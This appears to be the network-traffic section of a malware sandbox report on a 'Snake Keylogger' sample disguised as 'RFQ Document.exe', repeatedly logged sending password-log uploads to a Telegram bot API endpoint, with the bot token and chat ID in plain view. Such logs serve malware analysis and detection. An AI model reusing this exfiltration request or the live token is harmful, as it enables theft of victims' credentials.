                                            2021-09-28 05:59:08 UTC261INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12752,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            164192.168.2.449979149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC262OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de28f1b6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC262OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 32 38 66 31 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de28f1b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:08 UTC263INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:08 UTC263INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12753,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            165192.168.2.449980149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC264OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de403f36
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC264OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 34 30 33 66 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de403f36Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:08 UTC264INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:08 UTC265INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12754,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            166192.168.2.449981149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC265OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de5cd898
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC265OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 35 63 64 38 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de5cd898Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:08 UTC266INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:08 UTC266INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12755,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            167192.168.2.449982149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC267OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de7bd6f1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 37 62 64 36 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de7bd6f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:08 UTC267INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:08 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:08 UTC268INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12756,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            168192.168.2.449983149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:08 UTC268OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255de93c063
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:08 UTC269OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 39 33 63 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255de93c063Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC269INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC269INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12757,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            169192.168.2.449984149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:09 UTC270OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255deb05f41
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:09 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 62 30 35 66 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255deb05f41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:09 UTC271INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:09 UTC271INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12758,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            17192.168.2.449791149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:24 UTC26OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c3d6b706
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:24 UTC27OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 64 36 62 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c3d6b706Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:24 UTC27INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:24 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:24 UTC28INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64
